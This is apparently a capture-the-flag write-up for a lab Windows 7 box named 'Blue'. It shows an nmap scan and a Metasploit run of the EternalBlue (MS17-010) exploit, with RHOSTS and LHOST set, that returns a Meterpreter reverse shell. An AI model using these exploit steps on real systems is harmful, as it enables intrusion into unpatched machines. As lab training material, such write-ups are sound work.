Blue
Contents
Intro
Very quick box, the name of it gives a significant hint as to what you're supposed to do here...
User and Root
Running nmap:
sudo nmap -sC -sV 10.129.24.215 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
The machine is running Windows 7, which has been long outdated, which is a good indicator it might be vulnerable to EternalBlue. We can use msfconsole to test that theory:
[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue [msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOSTS 10.129.24.215 RHOSTS => 10.129.24.215 [msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST tun0 LHOST => *.*.*.* [msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run (Meterpreter 1)(C:\Windows\system32) >
We get a meterpreter on the machine, and we get both flags at the same time!